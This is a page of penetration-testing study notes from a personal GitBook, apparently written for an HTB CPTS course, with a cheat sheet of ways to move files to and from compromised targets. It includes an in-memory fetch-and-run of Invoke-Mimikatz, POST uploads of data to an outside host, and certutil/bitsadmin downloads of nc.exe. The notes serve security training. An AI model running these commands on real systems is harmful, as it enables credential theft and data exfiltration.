Hacker Kayra
  • ๐Ÿ“Introduction Page
  • โญLearning Process
    • ๐Ÿง Learning Mindset
    • ๐Ÿ–‡๏ธLearning Dependencies
    • ๐ŸงฎLearning Process
  • ๐Ÿ” Fundamentals
    • ๐Ÿ›œNetworking Fundamentals
    • ๐ŸงLinux Fundamentals
    • ๐ŸชŸWindows Fundamentals
    • ๐Ÿ•ต๏ธActive Directory
    • ๐Ÿ•ธ๏ธIntroduction to Web Applications
    • ๐Ÿ—ƒ๏ธOther Useful Concepts
      • Regular Expressions (RegEx)
  • ๐ŸงฐTools
    • Nmap
    • Nessus
    • Ffuf
    • Hydra
    • John The Ripper
  • โœ๏ธWrite Ups
    • ๐Ÿ—ƒ๏ธHack The Box Machines
      • ๐ŸงLinux
        • Code
    • ๐Ÿ—ƒ๏ธProving Grounds Boxes
      • ๐ŸงLinux
        • Stapler
        • eLection
        • Loly
        • Blogger
        • Potato
        • Amaterasu
        • Exfiltrated
        • Pelican
        • Astronaut
        • Cockpit
        • Levram
        • Extplorer
        • LaVita
        • pc
        • Scrutiny
        • Zipper
        • Flu
        • Twiggy
        • Codo
        • Crane
        • Hub
        • BlackGate
        • Boolean
        • ClamAV
        • PayDay
        • Snookums
        • Bratarina
        • Nibbles
      • ๐ŸชŸWindows
        • Algernon
        • AuthBy
        • Craft
        • Kevin
        • Squid
        • Jacko
        • DVR4
        • Hepet
        • Shenzi
        • Nickel
        • Slort
        • MedJed
        • Active Directory
          • Access
          • Vault
    • ๐ŸชชCertificates
      • Certified Professional Penetration Tester (eCPPTv3)
      • Web Application Penetration Tester eXtreme (eWPTXv3)
    • ๐ŸšฉCTF Events
      • Cyber Hub 2025 CTF
  • ๐Ÿ“šStudy Notes
    • Penetration Tester (HTB CPTS)
      • Penetration Testing Process
      • Reconnaissance, Enumeration & Attack Planning
        • Network Enumeration with Nmap (Continue Here)
        • Footprinting (Just Do Formatting)
        • Vulnerability Scanning (Check)
        • File Transfers
        • Using the Metasploit Framework
        • Web Information Gathering
        • Shells & Payloads
      • Exploitation & Lateral Movement
        • Attacking Common Services (Just Do Formatting)
        • Password Attacks (TBC)
        • Active Directory Enumeration & Attacks (TBC)
        • Pivoting, Tunneling, and Port Forwarding (TBC)
      • Web Exploitation
        • Using Web Proxies (Check)
        • Attacking Web Applications With Ffuf (Check)
        • Login Bruteforcing
        • Cross-Site Scripting (XSS)
        • Command Injection
        • SQL Injection
        • File Upload Attacks
        • File Inclusion
        • Web Attacks (Check)
        • Attacking Common Applications (Check)
      • Post-Exploitation
        • Linux Privilege Escalation
        • Windows Privilege Escalation (TBC)
      • Documentation & Reporting
  • ๐Ÿง‘โ€๐Ÿ’ปOther
    • Leet Code
      • Quick Guide: Big-O Notation
      • Problem 01 - Two Sum
    • Data Structure & Algorithms (DSA)
  • ๐Ÿ—„๏ธArchive/Backup/Bin
    • Sysmon Usecases (IBM)
    • ๐ŸงLinux Fundamentals (TryHackMe)
      • Introduction
      • Basic Commands
      • Wildcards & Operators
      • Permissions
      • Common Directories
      • Terminal Text Editors
      • General/Useful Utilities
    • ๐ŸชŸWindows Fundamentals (TryHackMe)
      • Introduction
      • The File System
      • User Accounts
      • Settings & Control Panel & Task Manager
      • System Configuration
    • Active Directory (TryHackMe)
      • Breaching Active Directory
    • FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics
      • Book 2 - Intrusion Analysis
        • Credential Theft
        • Event Log Analysis for Responders and Hunters
    • Certified Threat Hunting Professional (eCTHPv2)
      • Threat Hunting: Hunting the Endpoint & Endpoint Analysis
        • Event IDs, Logging, & SIEMs
    • OSCP
      • Report Writing
      • โœ…Passive Information Gathering
      • โœ…Active Information Gathering
      • โœ…Vulnerability Scanning
      • Introduction to Web Application Attacks
      • Common Web Application Attacks
        • โœ…Cross-Site Scripting (XSS)
        • โœ…Directory Traversal
        • โœ…File Inclusion
        • โœ…File Upload Vulnerabilities
        • Command Injection
        • SQL Injection Attacks
        • Client Side Attacks
      • โœ…Locating Public Exploits
      • โœ…Exploiting Walkthrough
      • Fixing Exploits
      • โœ…Antivirus Evasion
      • Password Attacks
      • Windows Privilege Escalation
      • Linux Privilege Escalation
      • Port Redirection and SSH Tunneling
      • Tunneling Through Deep Packet Inspection
      • The Metasploit Framework
      • Active Directory Introduction & Enumeration
      • Attacking Active Directory Authentication
      • Lateral Movement in Active Directory
      • Assembling the Pieces
      • Other General Information
    • โšกPort Swigger (Web Penetration Testing)
      • โœ…Information Disclosure
      • โœ…Path Traversal (Directory Traversal)
      • โœ…OS Command Injection
      • Business Logic Vulnerabilities
      • โœ…Authentication
      • โœ…Access Control
    • Certified Bug Bounty Hunter (CBBH)
      • Web Requests
        • HTTP Fundamentals
    • Getting Started
      • Introduction
      • Pentesting Basics
    • Certified Penetration Testing Specialist (CPTS)
      • Introduction
        • โœ…Penetration Testing Process
          • Penetration Testing Overview
          • Laws & Regulations
          • Penetration Testing Process
          • Pre-Engagement
          • Information Gathering
          • Vulnerability Assessment
          • Exploitation
          • Post-Exploitation
          • Lateral Movement
          • Proof-of-Concept
          • Post-Engagement
          • Practice
          • Academy Module Layout
        • Getting Started with Hack The Box (HTB)
      • Reconnaissance, Enumeration & Attack Planning
        • โœ…Network Enumeration with Nmap
          • Enumeration & Introduction to Nmap
          • Host Discovery
          • Host and Port Scanning
          • Saving The Results
          • Service Enumeration
          • Nmap Scripting Engine
          • Scanning Performance
          • Firewall and IDS/IPS Evasion
        • Footprinting
        • โœ…Information Gathering - Web Edition
          • Introduction
          • Passive Information Gathering
          • Active Information Gathering
        • Vulnerability Assessment
        • File Transfers
        • Shells & Payloads
        • Using the Metasploit Framework
      • Exploitation & Lateral Movement
        • Password Attacks
        • Attacking Common Services
        • Pivoting, Tunneling, and Port Forwarding
        • Active Directory Enumeration & Attacks
      • Web Exploitation
        • Using Web Proxies
        • โœ…Attacking Web Applications with Ffuf
        • โœ…Login Brute Forcing
        • SQL Injection Fundamentals
        • SQLMap Essentials
        • Cross-Site Scripting (XSS)
        • File Inclusion
        • File Upload Attacks
        • Command Injections
        • Web Attacks
        • Attacking Common Applications
      • Post-Exploitation
        • Linux Privilege Escalation
        • Windows Privilege Escalation
      • Reporting & Capstone
        • Documentation & Reporting
        • Attacking Enterprise Networks
    • Old Active Directory
    • Tib3rius Privilege Escalation
      • Linux Privilege Escalation
    • HTB Archived Write-Ups (Check)
      • Irked
      • Nibbles
      • Brainfuck
      • Lame (Check)
    • ๐Ÿ“‹Cheat Sheets
      • Penetration Testing Cheat Sheet (In Progress)
Powered by GitBook
On this page
  1. Study Notes
  2. Penetration Tester (HTB CPTS)
  3. Reconnaissance, Enumeration & Attack Planning

File Transfers

  • In penetration testing, you will usually need to transfer files to and from your targets. For example, you might exploit a target and need to upload a script to check for vulnerabilities in the system.

  • Since there are usually restrictions in place, you need to know different techniques. If one technique doesnโ€™t work, you can try another or even combine or chain different techniques to bypass the controls of the target.

  • There are multiple techniques that work in different situations, some of which utilize Living off the Land binaries. These binaries can be checked here:

    • Windows - https://lolbas-project.github.io/

    • Linux - https://gtfobins.github.io/

  • Below is a cheatsheet with some of the techniques:

Invoke-WebRequest <Target>/<File-to-Download> -OutFile <Output-File-Name> # Download a file using Powershell. Example: Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1

Invoke-WebRequest <File-to-Download> -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "<Output-File>" # Changing the User agent. Example: Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe" # Changing the User agent.

IEX (New-Object Net.WebClient).DownloadString('<Target>/<File-to-Execute>') # Execute a file in memory using powershell. Example: IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke
Mimikatz.ps1')

Invoke-WebRequest -Uri <Target-to-Upload> -Method POST -Body <Data-to-Upload> # Upload a file using Powershell. Example: Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

bitsadmin /transfer n <Source-to-Download-from>/<File-Name> <Output-Path> # Download a file using bitsadmin. Example:  bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

certutil.exe -verifyctl -split -f <Source-to-Download-From>/<File-Name> # Download a file using certutil. Example: certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

wget <Link-to-Download-From> # Downloading a file using wget.

curl -o <Output-File-Name> <URL-to-Download-From> # Download a file using curl.

php -r '$file = file_get_contents("<Source-to-Download-from>"); file_put_contents("<Output-File>",$file);' # Download a file using PHP

scp <Output-File> <Source-to-Download-from> # Download a file using scp. Example: scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip
PreviousVulnerability Scanning (Check)NextUsing the Metasploit Framework

Last updated 2 days ago

๐Ÿ“š